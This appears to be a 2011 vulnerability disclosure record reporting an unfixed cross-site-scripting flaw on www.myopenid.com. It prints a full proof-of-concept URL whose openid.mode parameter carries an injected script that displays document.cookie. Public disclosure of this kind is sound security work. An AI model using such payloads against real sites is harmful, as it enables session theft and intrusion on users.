Security researcher SeeMe, has submitted on 09/11/2011 a cross-site-scripting (XSS) vulnerability affecting www.myopenid.com, which at the time of submission ranked 50573 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 09/11/2011 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: SeeMe |
Domain: www.myopenid.com |
Category: XSS |
Pagerank: 50573 |
URL: http://www.myopenid.com/server?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=%27% 22--%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&openid.assoc_handle=%7BHMAC-SHA1%7D%7B 4e1aa111%7D%7BrGO58w%3D%3D%7D&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentif ier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ret urn_to=https%3A%2F%2Flogin.janrain.com%2Fopenid%2Ffinish%3Fdiscovery_token%3Dpd%253A61b231b12f560e20 &openid.realm=https%3A%2F%2F%2A.janrain.com%2F&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fextensions%2 Fsreg%2F1.1&openid.sreg.policy_url=https%3A%2F%2Flogin.janrain.com%2Fopenid%2Fsreg_policy&openid.sre g.optional=nickname%2Cemail%2Cfullname |
Click here to view the mirror
|
|
|